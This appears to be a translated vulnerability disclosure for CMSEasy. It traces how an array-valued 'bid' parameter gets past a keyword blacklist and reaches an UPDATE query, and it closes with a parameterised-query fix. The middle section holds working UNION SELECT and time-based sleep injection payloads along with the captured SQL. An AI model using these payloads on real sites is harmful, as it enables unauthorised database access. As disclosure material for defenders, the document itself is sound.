
CMSEasy: improper fix leaves an unrestricted front-end SELECT/UNION injection (bypasses WebScan)

2015-04-30 23:35

Download the latest version:

ballot_act.php:

Code:
    function index_action() {
        if (front::post('submit')) {
            if (!front::post('ballot')) {
                front::alert(lang('Please_select_vote'));
                return false;
            }
            if (config::get('checkip')) {
                $time=cookie::get('vttime');
                if (time() -$time <config::get('timer') * 60) {
                    front::alert(lang('You_have_voted'));
                    return false;
                }
            }
            $bid=front::$post['bid'];
            if (is_array(front::$post['ballot'])) {
                $ids=implode(',',front::$post['ballot']);
            }
            else {
                $ids=front::$post['ballot'];
            }
            // keyword blacklist on the raw input; this is the "fix" under discussion
            if(preg_match('/(select|union|and|\'|"|\))/i',$ids)){
                exit('非法参数');
            }
            // the same blacklist on bid; preg_match() only works on a string subject
            if(preg_match('/(select|union|and|\'|"|\))/i',$bid)){
                exit('非法参数');
            }
            $where="id in($ids)";
            $data='num=num+1';
            $option=new option();
            $option->rec_update($data,$where);
            // bid is passed straight through as the WHERE condition
            $this->_table->rec_update($data,$bid);
            // ... (remainder of index_action() not included in the original excerpt)
        }
    }





Here a first-pass filter is applied to the bid and ids variables.

Analysis shows that the ids variable is also flawed, but it is awkward to use and offers no good angle, so let us turn to bid instead.

What happens if bid is an array? preg_match() expects a string subject; given an array it emits a warning and returns false, so the blacklist check simply never fires.



rec_update:

Code:
    function rec_update($row,$where) {
        $tbname=$this->name;
        // $where is handed on unchanged, array or string
        $sql=$this->sql_update($tbname,$row,$where);
        //echo $sql."<br>";
        return $this->query_unbuffered($sql);
    }





Following it further into:

sql_update:

Code:
    function sql_update($tbname,$row,$where) {
        //var_dump($row);
        $sqlud='';
        if (is_string($row))
            $sqlud = $row.' ';
        else
            foreach ($row as $key=>$value) {
                if (in_array($key,explode(',',$this->getcolslist()))) {
                    $value=$value;
                    /*if (preg_match('/^\[(.*)\]$/',$value,$match))
                        $sqlud .= "`$key`"."= '".$match[1]."',";
                    else*/if ($value === "")
                        $sqlud .= "`$key`= NULL, ";
                    else
                        $sqlud .= "`$key`"."= '".$value."',";
                }
            }
        $sqlud=rtrim($sqlud);
        $sqlud=rtrim($sqlud,',');
        // an array $where is flattened into a string by condition() (passed by reference)
        $this->condition($where);
        $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where;
        //echo $sql;
        return $sql;
    }







Following it further into the condition function:

Code:
    function condition(&$condition) {
        if (isset($condition) &&is_array($condition)) {
            $_condition=array();
            foreach ($condition as $key=>$value) {
                //$value=str_replace("'","\'",$value);
                // the array key becomes the column name; only HTML escaping is applied
                $key = htmlspecialchars($key,ENT_QUOTES);
                $_condition[]="`$key`='$value'";
            }
            $condition=implode(' and ',$_condition);
        }
    }





htmlspecialchars() does not escape the backtick at all, so this is yet another self-deceiving check.





We request:

http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index:



POST data:



submit=xx&ballot=1,2,3,4&bid[xxx%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=xxxxxxxxxxxxxxxxxx



Here we are only checking whether the input makes it into the query:



Captured:






2015/1/27 12:54 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `xxx`=1 UNION SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1#`='xxxxxxxxxxxxxxxxxx'



See that? Unrestricted injection. A quick confirmation with a time-based injection:

http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index



POST data:



submit=xx&ballot=1,2,3,4&bid[num%60%3d1%20or%20sleep/**/(5)%23]=xxxxxxxxxxxxxxxxxx





Captured:

2015/1/27 13:04 UPDATE `cmseasy_ballot` SET num=num+1 WHERE `num`=1 and sleep/**/(5)#`='xxxxxxxxxxxxxxxxxx'





Executed successfully.



Proof of vulnerability:

Fix:
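As an added example (not CMSEasy's own code), the following PHP replaces the condition()/sql_update() string building with a whitelist on column names and a parameterised WHERE clause, so an array-keyed bid like the one in the POST data above is rejected instead of being concatenated into SQL. The column list and the sample inputs are constructed here; the real code would take the list from getcolslist().

```php
<?php
// Added example, not CMSEasy's own code: a hardened replacement for the
// condition()/sql_update() string building shown above. It returns a
// parameterised UPDATE statement plus its bound values instead of pasting
// user input into SQL. Assumption: $allowedCols is the target table's column
// list (the real code gets it from getcolslist(); a constructed list is used here).
// $set is the constant fragment the caller builds ('num=num+1'), never user input.

function build_update(string $table, string $set, $where, array $allowedCols): array
{
    $params = [];
    if (!is_array($where)) {
        // The original accepted any scalar as a raw WHERE fragment. Only a
        // plain numeric id is allowed here.
        if (!is_scalar($where) || !ctype_digit((string)$where)) {
            throw new InvalidArgumentException('bid must be a numeric id');
        }
        $clause = '`id` = ?';
        $params[] = (int)$where;
    } else {
        $parts = [];
        foreach ($where as $key => $value) {
            // Whitelist the column name instead of escaping it: htmlspecialchars()
            // leaves backticks alone, which is exactly what the payload relies on.
            if (!in_array($key, $allowedCols, true)) {
                throw new InvalidArgumentException("unknown column: $key");
            }
            if (!is_scalar($value)) {
                throw new InvalidArgumentException('where value must be scalar');
            }
            $parts[] = "`$key` = ?";
            $params[] = $value;
        }
        if ($parts === []) {
            throw new InvalidArgumentException('empty where clause');
        }
        $clause = implode(' AND ', $parts);
    }
    return ["UPDATE `$table` SET $set WHERE $clause", $params];
}

// Constructed inputs: a legitimate vote and the array-keyed bid from the post.
$cols = ['id', 'num', 'title'];
[$sql, $params] = build_update('cmseasy_ballot', 'num=num+1', '7', $cols);
echo $sql, ' -- bound: ', json_encode($params), "\n";

try {
    build_update('cmseasy_ballot', 'num=num+1', ['num`=1 or sleep/**/(5)#' => 'x'], $cols);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The returned statement and parameter array are meant to be passed to a prepared statement (PDO or mysqli), which is what removes the injection rather than any keyword blacklist.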


Source: www.wooyun.org/bugs/wooyun-2015-094160
